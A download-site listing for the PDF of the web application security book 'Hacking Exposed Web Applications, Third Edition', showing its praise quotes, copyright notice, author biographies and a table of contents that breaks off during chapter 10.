超过470,000+ 应用技术资源下载

Hacking Exposed Web Applications 3rd.pdf

  • 1星
  • 日期: 2014-06-13
  • 大小: 3.51MB
  • 所需积分:1分
  • 下载次数:0
  • favicon收藏
  • rep举报
  • 分享
  • free评论
标签: HackingExposedWebApplications3rd

Hacking Exposed Web Applications 3rd.pdf

Praise for Hacking Exposed™ Web Applications: Web Application Security Secrets and Solutions, Third Edition “Whether you are a business leader attempting to understand the threat space for your business, or an engineer tasked with writing the code for those sites, or a security engineer attempting to identify and mitigate the threats to your applications, this book will be an invaluable weapon in your arsenal.” —From the Foreword by Chris Peterson Senior Director of Application Security, Zynga Game Network Former Director of Security Assurance, Microsoft Corporation “I cut my teeth reading Joel’s work, and this book is no disappointment. People often ask where to find high-quality content that will help them gain a foothold in this daunting industry. This is the kind of desk reference every web application security practitioner needs. It will certainly hold a place of prominence in my personal library.” —Robert “RSnake” Hansen CEO SecTheory and founder of “An eye-opening resource for realizing the realities of today’s web application security landscape, this book explores the latest vulnerabilities as well as exploitation techniques and tradecraft being deployed against those vulnerabilities. This book is a valuable read for both the aspiring engineer who is looking for the first foray into the world of web application security and the seasoned application-security, penetration-testing expert who wants to keep abreast of current techniques.” —Chad Greene Director, eBay Global Information Security “As our businesses push more of their information and commerce to their customers through webapplications, the confidentiality and integrity of these transactions is our fundamental, if not mandatory, responsibility. Hacking Exposed Web Applications provides a comprehensive blueprint for application developers and security professionals charged with living up to this responsibility. The authors’ research, insight, and 30+ years as information security experts, make this an invaluable resource in the application and information protection toolkit. Great Stuff!” —Ken Swanson CISM, IS Business Solution Manager, regionally based P&C insurance company “This book is so much more then the authoritative primer on web application security; it’s also an opportunity to accompany the foremost industry experts in an apprenticeship that even seasoned professionals will enjoy.” —Andrew Stravitz, CISSP Director of Information Security, Barnes & “A very timely reference, as cloud computing continues to expand into the enterprise and web security emerges as the new battleground for attackers and defenders alike. This comprehensive text is the definitive starting point for understanding the contemporary landscape of threats and mitigations to web applications. Particularly notable for its extensive treatment of identity management, marking the first time that challenges around authentication have been surveyed in-depth and presented in such an accessible fashion.” —Cem Paya Google Security Team HACKING EXPOSED™ WEB APPLICATIONS: WEB APPLICATION SECURITY SECRETS AND SOLUTIONS THIRD EDITION JOEL SCAMBRAY VINCENT LIU CALEB SIMA New York Chicago San Francisco Lisbon London Madrid Mexico City Milan New Delhi San Juan Seoul Singapore Sydney Toronto Copyright © 2011 by Joel Scambray. All rights reserved. Except as permitted under the United States Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher. ISBN: 978-0-07-174042-5 MHID: 0-07-174042-2 The material in this eBook also appears in the print version of this title: ISBN: 978-0-07-174064-7, MHID: 0-07-174064-3. All trademarks are trademarks of their respective owners. Rather than put a trademark symbol after every occurrence of a trademarked name, we use names in an editorial fashion only, and to the benefit of the trademark owner, with no intention of infringement of the trademark. Where such designations appear in this book, they have been printed with initial caps. McGraw-Hill eBooks are available at special quantity discounts to use as premiums and sales promotions, or for use in corporate training programs. To contact a representative please e-mail us at Trademarks: McGraw-Hill, the McGraw-Hill Publishing logo, Hacking ExposedTM, and related trade dress are trademarks or registered trademarks of The McGraw-Hill Companies and/or its affiliates in the United States and other countries and may not be used without written permission. All other trademarks are the property of their respective owners. The McGraw-Hill Companies is not associated with any product or vendor mentioned in this book. Information has been obtained by McGraw-Hill from sources believed to be reliable. However, because of the possibility of human or mechanical error by our sources, McGraw-Hill, or others, McGraw-Hill does not guarantee the accuracy, adequacy, or completeness of any information and is not responsible for any errors or omissions or the results obtained from the use of such information. TERMS OF USE This is a copyrighted work and The McGraw-Hill Companies, Inc. (“McGrawHill”) and its licensors reserve all rights in and to the work. Use of this work is subject to these terms. Except as permitted under the Copyright Act of 1976 and the right to store and retrieve one copy of the work, you may not decompile, disassemble, reverse engineer, reproduce, modify, create derivative works based upon, transmit, distribute, disseminate, sell, publish or sublicense the work or any part of it without McGraw-Hill’s prior consent. You may use the work for your own noncommercial and personal use; any other use of the work is strictly prohibited. Your right to use the work may be terminated if you fail to comply with these terms. THE WORK IS PROVIDED “AS IS.” McGRAW-HILL AND ITS LICENSORS MAKE NO GUARANTEES OR WARRANTIES AS TO THE ACCURACY, ADEQUACY OR COMPLETENESS OF OR RESULTS TO BE OBTAINED FROM USING THE WORK, INCLUDING ANY INFORMATION THAT CAN BE ACCESSED THROUGH THE WORK VIA HYPERLINK OR OTHERWISE, AND EXPRESSLY DISCLAIM ANY WARRANTY, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. McGraw-Hill and its licensors do not warrant or guarantee that the functions contained in the work will meet your requirements or that its operation will be uninterrupted or error free. Neither McGraw-Hill nor its licensors shall be liable to you or anyone else for any inaccuracy, error or omission, regardless of cause, in the work or for any damages resulting therefrom. McGraw-Hill has no responsibility for the content of any information accessed through the work. Under no circumstances shall McGraw-Hill and/or its licensors be liable for any indirect, incidental, special, punitive, consequential or similar damages that result from the use of or inability to use the work, even if any of them has been advised of the possibility of such damages. This limitation of liability shall apply to any claim or cause whatsoever whether such claim or cause arises in contract, tort or otherwise. Stop Hackers in Their Tracks Hacking Exposed, 6th Edition Hacking Exposed Malware & Rootkits Hacking Exposed Computer Forensics, 2nd Edition 24 Deadly Sins of Software Security Hacking Exposed Linux, 3rd Edition Hacking Exposed Windows, 3rd Edition Hacking Exposed Web 2.0 Hacking Exposed: Web Applications, 2nd Edition Gray Hat Hacking, 2nd Edition Hacking Exposed Wireless Hacking Exposed VoIP IT Auditing: Using Controls to Protect Information Assets ABOUT THE AUTHORS Joel Scambray Joel Scambray is co-founder and CEO of Consciere, provider of strategic security advisory services. He has assisted companies ranging from newly minted startups to members of the Fortune 50 to address information security challenges and opportunities for over a dozen years. Joel’s background includes roles as an executive, technical consultant, and entrepreneur. He has been a Senior Director at Microsoft Corporation, where he led Microsoft’s online services security efforts for three years before joining the Windows platform and services division to focus on security technology architecture. Joel also cofounded security software and services startup Foundstone, Inc., and helped lead it to acquisition by McAfee for $86M. He previously held positions as a manager for Ernst & Young, a security columnist for Microsoft TechNet, Editor at Large for InfoWorld Magazine, and director of IT for a major commercial real-estate firm. Joel is widely recognized as co-author of Hacking Exposed: Network Security Secrets and Solutions, the international best-selling computer security book that first appeared in 1999. He is also lead author of the Hacking Exposed Windows and Hacking Exposed Web Applications series. He has spoken widely on information security at forums including Black Hat, I-4, INTERFACE, and The Asia Europe Meeting (ASEM), as well as organizations including IANS, CERT, The Computer Security Institute (CSI), ISSA, ISACA, SANS, private corporations, and government agencies such as the Korean Information Security Agency (KISA), FBI, and the RCMP. Joel holds a BS from the University of California at Davis, an MA from UCLA, and he is a Certified Information Systems Security Professional (CISSP). Vincent Liu Vincent Liu, CISSP, is a Managing Partner at Stach & Liu. Before founding Stach & Liu, Vincent led the Attack & Penetration and Reverse Engineering teams for the Global Security unit at Honeywell International. Prior to that, he was a consultant with the Ernst & Young Advanced Security Centers and an analyst at the National Security Agency. Vincent is a sought-after speaker and has presented his research at conferences, including Black Hat, ToorCon, and Microsoft BlueHat. Vincent holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. Caleb Sima Caleb Sima is the CEO of Armorize Technologies, the Santa Clara–based provider of integrated Web application security solutions. He previously founded SPI Dynamics in 2000 and, as CTO, oversaw the development of WebInspect, a solution that set the bar in Web application security testing tools. When HewlettPackard (HP) acquired SPI Dynamics in 2007, Sima took on the role of Chief Technologist at HP’s Application Security Center, where he directed the company’s security solutions’ lifecycles and spearheaded development of its cloud-based security service. In this role, he also managed a team of accomplished security experts who successfully identified new security threats and devised advanced countermeasures. Prior to co-founding SPI Dynamics, Caleb worked for Internet Security Systems’ elite X-Force research and development team where he drove enterprise security assessments for the company. A thought leader and technical visionary in the web application security field, Sima holds five patents on web security technology and has co-authored textbooks on the subject, is a frequent media contributor, and regularly speaks at key industry conferences such as RSA and Black Hat. He is a member of ISSA and is one of the founding visionaries of the Application Vulnerability Description Language (AVDL) standard within OASIS, as well as a founding member of the Web Application Security Consortium (WASC). ABOUT THE CONTRIBUTING AUTHORS Hernan Ochoa is a security consultant and researcher with over 14 years of professional experience. Hernan began his professional career in 1996 with the creation of Virus Sentinel, a signature-based file/memory/mbr/boot sector detection/removal antivirus application with heuristics to detect polymorphic viruses. Hernan also developed a detailed technical virus information database and companion newsletter. He joined Core Security Technologies in 1999 and worked there for 10 years in various roles, including security consultant and exploit writer. As an exploit writer, he performed diverse types of security assessments, developed methodologies, shellcode, and security tools, and contributed new attack vectors. He also designed and developed several lowlevel/kernel components for a multi-OS security system that was ultimately deployed at a financial institution, and he served as “technical lead” for ongoing development and support of the multi-OS system. Hernan has published a number of security tools, including Universal Hooker (runtime instrumentation using dynamic handling routines written in Python), Pass-The-Hash Toolkit for Windows, and WifiZoo. He is currently working as a security consultant/researcher at Amplia Security, performing network, wireless, and web applications penetration tests; standalone/client-server application black-box assessments; source code audits; reverse engineering; vulnerability analysis; and other information security–related services. Justin Hays is a Senior Security Associate at Stach & Liu. Before joining Stach & Liu, Justin served as an enterprise support engineer for PTC Japan where his responsibilities included application debugging, reverse engineering, and mitigating software defects in PTC’s flagship Windchill enterprise server J2EE software. Prior to PTC, Justin held a software development position with Lexmark, Inc., where he designed and implemented web application software in support of internal IT operations. Justin holds a BS from the University of Kentucky with a major in Computer Science and a minor in Mathematics. Carl Livitt is a Managing Security Associate at Stach & Liu. Prior to joining Stach & Liu, Carl led the network security services group for a well-respected UK security company and provided network security consultancy for several of the largest pharmaceutical companies in the world. Carl has also worked with UK police counterterrorism units, lecturing on technological security issues to specialist law-enforcement agencies. Rob Ragan is a Senior Security Associate at Stach & Liu. Before joining Stach & Liu, Rob served as a software engineer at Hewlett-Packard’s Application Security Center, where he developed web application security testing tools and conducted application penetration testing. Rob actively conducts web application security research and has presented at Black Hat, Defcon, InfoSec World, and Outerz0ne. Rob holds a BS from Pennsylvania State University with a major in Information Sciences and Technology and a focus on System Development. About the Technical Editor Robert Hensing is a Senior Consultant at Microsoft, where he has worked in various security roles for over 12 years. Robert previously worked with the Microsoft Security Response Center with a focus on providing root cause analysis and identifying mitigations and workarounds for security vulnerabilities to help protect customers from attacks. Prior to working on the MSRC Engineering team, Robert was a senior member of the Customer Support Services Security team, where he helped customers with incident response–related investigations. Robert was also a contributing author on Hacking Exposed Windows: Windows Security Secrets and Solutions, Third Edition. AT A GLANCE ▼1 ▼2 ▼3 ▼4 ▼5 ▼6 ▼7 ▼8 ▼9 ▼ 10 ▼A ▼B ▼ Hacking Web Apps 101 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Profiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31 Hacking Web Platforms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 Attacking Web Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . 123 Attacking Web Authorization . . . . . . . . . . . . . . . . . . . . . . . . . . . 167 Input Injection Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 221 Attacking XML Web Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267 Attacking Web Application Management . . . . . . . . . . . . . . . . . 295 Hacking Web Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 335 The Enterprise Web Application Security Program . . . . . . . . . 371 Web Application Security Checklist . . . . . . . . . . . . . . . . . . . . . . 413 Web Hacking Tools and Techniques Cribsheet . . . . . . . . . . . . . 419 Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 429 ix CONTENTS Foreword . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xix Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi ▼ 1 Hacking Web Apps 101 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 What Is Web Application Hacking? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 GUI Web Hacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 URI Hacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 Methods, Headers, and Body . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 Authentication, Sessions, and Authorization . . . . . . . . . . . . . . . . . . . . 6 The Web Client and HTML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Other Protocols . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 Why Attack Web Applications? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 Who, When, and Where? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 Weak Spots . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 How Are Web Apps Attacked? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 The Web Browser . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Browser Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 HTTP Proxies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 Command-line Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25 Older Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26 References & Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27 ▼ 2 Profiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31 Infrastructure Profiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32 Footprinting and Scanning: Defining Scope . . . . . . . . . . . . . . . . . . . . . 32 Basic Banner Grabbing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 Advanced HTTP Fingerprinting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34 Infrastructure Intermediaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38 xi xii Hacking Exposed Web Applications Application Profiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45 Manual Inspection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 Search Tools for Profiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66 Automated Web Crawling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72 Common Web Application Profiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77 General Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82 A Cautionary Note . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 Protecting Directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83 Protecting include Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84 Miscellaneous Tips . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85 References & Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85 ▼ 3 Hacking Web Platforms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87 Point-and-Click Exploitation Using Metasploit . . . . . . . . . . . . . . . . . . . . . . . . 89 Manual Exploitation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92 Evading Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104 Web Platform Security Best Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107 Common Best Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107 IIS Hardening . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110 Apache Hardening . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113 PHP Best Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119 References & Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119 ▼ 4 Attacking Web Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123 Web Authentication Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124 Username/Password Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124 Strong(er) Web Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144 Web Authentication Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147 Bypassing Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151 Token Replay . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151 Cross-site Request Forgery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153 Identity Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157 Client-side Piggybacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161 Some Final Thoughts: Identity Theft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162 References & Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164 ▼ 5 Attacking Web Authorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167 Fingerprinting Authz . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169 Crawling ACLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169 Identifying Access Tokens . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170 Analyzing Session Tokens . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172 Contents xiii Differential Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174 Role Matrix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175 Attacking ACLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177 Attacking Tokens . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178 Manual Prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179 Automated Prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187 Capture/Replay . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194 Session Fixation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195 Authorization Attack Case Studies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 196 Horizontal Privilege Escalation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 196 Vertical Privilege Escalation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 201 Differential Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204 When Encryption Fails . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 206 Using cURL to Map Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207 Authorization Best Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210 Web ACL Best Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211 Web Authorization/Session Token Security . . . . . . . . . . . . . . . . . . . . . 214 Security Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217 References & Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218 ▼ 6 Input Injection Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 221 Expect the Unexpected . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222 Where to Find Attack Vectors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224 Bypass Client-Side Validation Routines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 225 Common Input Injection Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 225 Buffer Overflow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 226 Canonicalization (dot-dot-slash) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227 HTML Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 233 Boundary Checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236 Manipulate Application Behavior . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 237 SQL Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238 XPATH Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 251 LDAP Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254 Custom Parameter Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255 Log Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256 Command Execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257 Encoding Abuse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259 PHP Global Variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259 Common Side-effects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260 Common Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 261 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262 References & Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264 xiv Hacking Exposed Web Applications ▼ 7 Attacking XML Web Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267 What Is a Web Service? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 268 Transport: SOAP over HTTP(S) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 269 WSDL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273 Directory Services: UDDI and DISCO . . . . . . . . . . . . . . . . . . . . . . . . . . 275 Similarities to Web Application Security . . . . . . . . . . . . . . . . . . . . . . . 279 Attacking Web Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279 Web Service Security Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 288 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291 References & Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 292 ▼ 8 Attacking Web Application Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295 Remote Server Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 296 Telnet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 296 SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297 Proprietary Management Ports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298 Other Administration Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299 Web Content Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299 FTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299 SSH/scp . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 300 FrontPage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 300 WebDAV . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 302 Misconfigurations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309 Unnecessary Web Server Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . 309 Information Leakage Misconfigurations . . . . . . . . . . . . . . . . . . . . . . . . 312 State Management Misconfiguration . . . . . . . . . . . . . . . . . . . . . . . . . . 327 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 332 References & Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 333 ▼ 9 Hacking Web Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 335 Exploits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336 Web Client Implementation Vulnerabilities . . . . . . . . . . . . . . . . . . . . . 337 Trickery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 352 General Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358 Low-privilege Browsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359 Firefox Security Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361 ActiveX Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361 Server-side Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364 References & Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364 ▼ 10 The Enterprise Web Application Security Program . . . . . . . . . . . . . . . . . . . . . . . . . . . 371 Threat Modeling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372 Clarify Security Objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374 Identify Assets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374 Contents xv Architecture Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375 Decompose the Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377 Identify and Document Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377 Rank the Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 379 Develop Threat Mitigation Strategies . . . . . . . . . . . . . . . . . . . . . . . . . . 380 Code Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 382 Manual Source Code Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 382 Automated Source Code Review . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387 Binary Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387 Security Testing of Web App Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 397 Fuzzing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 397 Test Tools, Utilities, and Harnesses . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399 Pen-testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 400 Security in the Web Development Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . 401 People . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 401 Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404 Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 406 Summary . . . . . . . . . . . . . . . . . . . . . . 